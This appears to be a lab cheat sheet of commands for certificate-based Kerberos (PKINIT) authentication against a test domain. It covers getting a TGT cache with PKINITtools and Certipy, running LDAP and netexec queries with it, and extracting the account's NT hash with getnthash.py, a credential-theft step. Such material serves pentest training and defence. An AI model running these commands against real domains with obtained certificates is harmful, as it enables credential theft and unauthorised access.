Certificate-based Kerberos uses PKINIT. When we have a certificate or PFX for an account, we request a TGT and store it as a ccache using PKINITtools or Certipy.
PEM certificate and key to ccache with PKINITtools:
gettgtpkinit.py -cert-pem user.crt -key-pem user.key ootw.local/student student.ccache
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist
PFX to ccache with PKINITtools:
gettgtpkinit.py -cert-pfx student.pfx -pfx-pass 'PfxPass2026!' ootw.local/student student.ccache
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist
PFX to ccache with Certipy:
certipy auth -pfx student.pfx -password 'PfxPass2026!' -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist
Use the resulting cache:
ldapsearch -Y GSSAPI -H ldap://dc01.ootw.local -b 'DC=ootw,DC=local' '(sAMAccountName=student)'
nxc ldap 10.10.10.200 -d ootw.local -u student -k --use-kcache
Extract NT hash after PKINIT with PKINITtools:
export KRB5CCNAME=FILE:$(pwd)/student.ccache
getnthash.py -key 0123456789abcdef0123456789abcdef ootw.local/student
The -key value is the AS-REP encryption key printed by gettgtpkinit.py. Keep it with the ccache until the workflow is complete.